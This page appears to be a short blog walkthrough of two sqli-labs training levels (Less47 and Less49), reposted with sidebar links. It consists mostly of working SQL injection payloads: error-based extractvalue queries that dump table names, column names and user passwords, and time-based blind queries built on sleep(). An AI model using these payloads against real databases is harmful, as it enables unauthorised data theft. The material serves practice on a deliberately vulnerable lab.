当前位置:网站首页>SQL injection Less47 (error injection) and Less49 (time blind injection)
SQL injection Less47 (error injection) and Less49 (time blind injection)
2022-07-31 22:51:00 【HUAWEI CLOUD】
Less47 and Less49 can't use rand() Boolean blind annotation
Because there are single quotes to closeorder by 'rand()' This statement obviously cannot be executedp>
Less47
?sort=1' and extractvalue(0,concat(0x7e,database()))--+
?sort=1' and extractvalue(0,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security")))--+
?sort=1' and extractvalue(0,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users")))--+
?sort=1' and extractvalue(0,concat(0x7e, (select group_concat(username,password) from users)))--+
Less49
?sort=1' and sleep(5)--+
?sort=1' and if(1,sleep(5),0)--+
?sort=1' and if(length(database())=8,sleep(5),0)--+
?sort=1' and if(ascii(substr(database(),1,1))=115,sleep(5),0)--+
?sort=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101,sleep(5),0)--+
?sort=1' and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)='i',sleep(5),0)--+
?sort=1' and if(ascii(substr((select username from users limit 0,1),1,1))=68,sleep(5),0)--+
边栏推荐
- useragent online lookup
- 不知道该怎么办的同步问题
- Student management system on the first day: complete login PyQt5 + MySQL5.8 exit the operation logic
- Daily practice——Randomly generate an integer between 1-100 and see how many times you can guess.Requirements: The number of guesses cannot exceed 7 times, and after each guess, it will prompt "bigger"
- Handwritten a simple web server (B/S architecture)
- Pytorch lstm time series prediction problem stepping on the pit "recommended collection"
- 二叉树非递归遍历
- "SDOI2016" Journey Problem Solution
- [Code Hoof Set Novice Village 600 Questions] Merge two numbers without passing a character array
- VOT2021 game introduction
猜你喜欢

GateWay implements load balancing

Network security - crack WiFi through handshake packets (detailed tutorial)

Payment module implementation

日常--Kali开启SSH(详细教程)

【Acwing】The 62nd Weekly Game Solution

Unity-LineRenderer显示一条线
![[Intensive reading of the paper] iNeRF](/img/a7/910667911e1ce8996b9d22de63ea04.png)
[Intensive reading of the paper] iNeRF

Structure of the actual combat battalion module eight operations

Implementation of a sequence table

Bionic caterpillar robot source code
随机推荐
Commonly used security penetration testing tools (penetration testing tools)
周总结
BM5 merge k sorted linked lists
(26)Blender源码分析之顶层菜单的关于菜单
Daily practice——Randomly generate an integer between 1-100 and see how many times you can guess.Requirements: The number of guesses cannot exceed 7 times, and after each guess, it will prompt "bigger"
In Golang go-redis cluster mode, new connections are constantly created, and the problem of decreased efficiency is solved
10大主流3D建模技术
C程序设计-方法与实践(清华大学出版社)习题解析
Student management system on the first day: complete login PyQt5 + MySQL5.8 exit the operation logic
Go1.18 upgrade function - Fuzz test from scratch in Go language
Summary of the classic drawing method of histogram
grep command written test questions
SQL注入 Less42(POST型堆叠注入)
SQL注入 Less38(堆叠注入)
手写一个简单的web服务器(B/S架构)
A shortcut to search for specific character content in idea
IJCAI2022 | 代数和逻辑约束的混合概率推理
A solution to the server encountered an internal error that prevented it from fulfilling this request [easy to understand]
Unity-LineRenderer显示一条线
Network security - crack WiFi through handshake packets (detailed tutorial)